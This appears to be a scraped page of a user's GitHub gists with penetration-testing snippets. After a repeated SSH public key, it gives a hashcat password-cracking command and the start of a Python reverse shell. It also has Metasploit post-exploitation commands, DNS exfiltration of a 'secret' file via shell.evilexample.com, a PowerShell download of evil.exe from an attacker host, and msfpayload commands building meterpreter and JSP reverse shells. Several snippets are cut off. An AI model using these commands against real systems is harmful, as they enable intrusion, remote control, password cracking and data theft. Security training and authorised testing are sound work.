@sckalath
sckalath / pub.txt
Created July 14, 2015 20:35
Test test
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCzIVkme1S+n58q3PjhTkxhS2jKR5MFThGdsUkJyh7Za5QvhB3arNbDvhLY/bB6b9LYpL/mEUTGJ+4hmcdTVj9Yq2QhItW/0DneTANbdtMUWYMMpTgrnQxKjF/eIp0CuLymLWkUuP/FtsfwTLQ4knZNdelg9N+r5FJDS0tbwPDgL2By+uFIXSsQXvpd0kOvGgMJ8x1m6bsjDZLYfflexFaZrVABES5d9DiyWCRFG5F3l3AzP1vP5llqS0Qyw0CNaUIfOLXDKmHN01ICWHpv1uFDFWI2FIGVoKTy1IX+pFE0noZJz5t2E2DIWrceuzUFcTuv2gvIv0IZ3sOkEG9x8hEB ryan@garland
@sckalath
sckalath / pub.txt
Created July 14, 2015 20:37
Test test
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCzIVkme1S+n58q3PjhTkxhS2jKR5MFThGdsUkJyh7Za5QvhB3arNbDvhLY/bB6b9LYpL/mEUTGJ+4hmcdTVj9Yq2QhItW/0DneTANbdtMUWYMMpTgrnQxKjF/eIp0CuLymLWkUuP/FtsfwTLQ4knZNdelg9N+r5FJDS0tbwPDgL2By+uFIXSsQXvpd0kOvGgMJ8x1m6bsjDZLYfflexFaZrVABES5d9DiyWCRFG5F3l3AzP1vP5llqS0Qyw0CNaUIfOLXDKmHN01ICWHpv1uFDFWI2FIGVoKTy1IX+pFE0noZJz5t2E2DIWrceuzUFcTuv2gvIv0IZ3sOkEG9x8hEB ryan@garland
@sckalath
sckalath / pub.txt
Created July 14, 2015 20:37
My public key
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCzIVkme1S+n58q3PjhTkxhS2jKR5MFThGdsUkJyh7Za5QvhB3arNbDvhLY/bB6b9LYpL/mEUTGJ+4hmcdTVj9Yq2QhItW/0DneTANbdtMUWYMMpTgrnQxKjF/eIp0CuLymLWkUuP/FtsfwTLQ4knZNdelg9N+r5FJDS0tbwPDgL2By+uFIXSsQXvpd0kOvGgMJ8x1m6bsjDZLYfflexFaZrVABES5d9DiyWCRFG5F3l3AzP1vP5llqS0Qyw0CNaUIfOLXDKmHN01ICWHpv1uFDFWI2FIGVoKTy1IX+pFE0noZJz5t2E2DIWrceuzUFcTuv2gvIv0IZ3sOkEG9x8hEB ryan@garland
@sckalath
sckalath / password_cracking
Created November 7, 2014 03:32
password cracking
#cracks md5(unix) hash, places found passwords in found.txt, removes them from the hash list and uses the rockyou wordlist
hashcat -m 500 -a 0 -o found.txt --remove hashes.txt /usr/share/wordlist/rockyou.txt
@sckalath
sckalath / simple_py_shell
Created November 7, 2014 03:39
Simple Python Shell
#!/usr/bin/python
# imports here
# Copyright 2012 TrustedSec, LLC. All rights reserved.
#
# This piece of software code is licensed under the FreeBSD license..
#
# Visit http://www.freebsd.org/copyright/freebsd-license.html for more information.
import socket,subprocess
HOST = '192.168.12.45' # The remote host
PORT = 443 # The same port as used by the server
@sckalath
sckalath / tricks
Last active October 29, 2018 23:22
tricks
#get a pty through python
python -c 'import pty; pty.spawn("/bin/bash");'
#grab the user agent from the http header on port 10443
tcpdump -A -l -vvvs 1024 -npi eth0 port 10443
#base64 decode a string
echo STRINGTODECODE | base64 --decode
#escape jail shell
@sckalath
sckalath / metasploit_snippets
Created November 7, 2014 03:05
Metasploit snippets
#autorun script (session.rc)
migrate -k -n explorer.exe
multi_console_command -cl "getsystem","getuid"
get_env
checkvm
#setting msf to use autorunscript above
set autorunscript multiscript.rb -rc /home/ryan/session.rc
@sckalath
sckalath / dns_egress_nix
Created June 27, 2014 16:42
DNS transfer on Linux
On victim:
1. Hex encode the file to be transferred:
xxd -p secret > file.hex
2. Read in each line and do a DNS lookup:
for b in `cat file.hex`; do dig $b.shell.evilexample.com;done
On attacker:
1. Capture DNS exfil packets
tcpdump -w /tmp/dns -s0 port 53 and host system.example.com
2. Cut the exfilled hex from the DNS packet
@sckalath
sckalath / powershell_snippets
Last active January 8, 2020 06:47
Powershell Snippets
# Transfer file from attacking box to victim
powershell.exe -noprofile -noninteractive -command "[System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true}; $source="""http://attackerip/evil.exe"""; $destination="""C:\destination_file.exe"""; $http=new-object System.Net.WebClient; $response=$http.DownloadFile($source,$destination);"
@sckalath
sckalath / msfpayload_commands
Last active August 17, 2021 07:55
msfpayload commands
# generate windows meterpreter on port 4444 that outputs an asp file
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.16.31 LPORT=4444 R | msfencode -o mwcb.asp -e generic/none -t asp
#generate jsp reverse tcp over port 443
msfpayload java/jsp_shell_reverse_tcp LHOST=192.168.16.31 LPORT=443 R > jsprev.jsp
#would likely need to add this jsp to a WAR file for deployment
jar -cvf jsprev.war * #from within the main war directory that also contains the WEB-INF dir
#simple javascript reverse shell over port 443